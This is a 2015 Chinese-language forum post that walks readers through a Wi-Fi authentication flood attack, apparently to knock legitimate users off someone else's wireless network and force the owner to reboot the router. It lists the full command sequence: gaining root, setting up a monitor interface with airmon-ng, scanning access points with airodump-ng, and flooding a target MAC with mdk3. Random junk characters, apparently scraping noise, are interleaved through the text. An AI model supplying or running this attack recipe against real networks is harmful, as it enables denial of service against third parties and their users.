本帖最后由 191966260 于 2015-2-2 22:49 编辑
, b! c: U# [ e3 I) N# x% ?. i, x3 X! j( |$ g, ?& l
身份验证攻击效果说明:
0 \' D, i* }5 w5 i4 j1 Q* Z此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击。其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超 过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络。迫使路由主人重启路由器。
" c( r- _, { o9 b7 s" x" `
下面是我整理的整个攻击的步骤及命令,有不明白兄弟可以留言探讨! (很多兄弟都会发现自己的linux系统中找不到mdk3,然后满世界去找mdk3,却发现无处下载。哈哈,其实你们的Linux中都是有mdk3的,只是菜单里找不到而已,我们用终端命令就可以打开它了!BELIEVE ME!) 打开终端并获取root权限(鼠标右键单击或者菜单里都可以找到终端):' Y5 X- ?! `1 ~% |0 S
sudo su 或 sudo -i( \ i: E e5 Q5 E9 L0 |
打开mdk3:
% y0 K6 F! `+ ksudo mdk3 首先检测网卡:8 M$ m3 `% C7 I( k3 ]/ _2 B1 y
ifconfig -a 然后模拟端口(一般默认wlan0):7 P: g- H8 s6 X8 H$ S. X3 r( O
airmon-ng start wlan0 接着扫描AP(ctrl+c暂停):
5 a1 j0 M2 A" d+ w; |% Hairodump-ng mon0 最后用mdk3做身份验证攻击(举例:mdk3 mon0 a -a 00:00:00:00:00)7 {9 S; S/ i+ v( K' u7 b; U l @
mdk3 mon0 a -a mac
1 W& u( }8 F5 j; y. x" d3 S
# Q+ S: z9 ?% W' R: k# m: Q, D7 l) m
7 E' P/ F& _/ ~
爱生活,爱anywlan,我是阿龙!5 }" B! q* A) ]3 A
|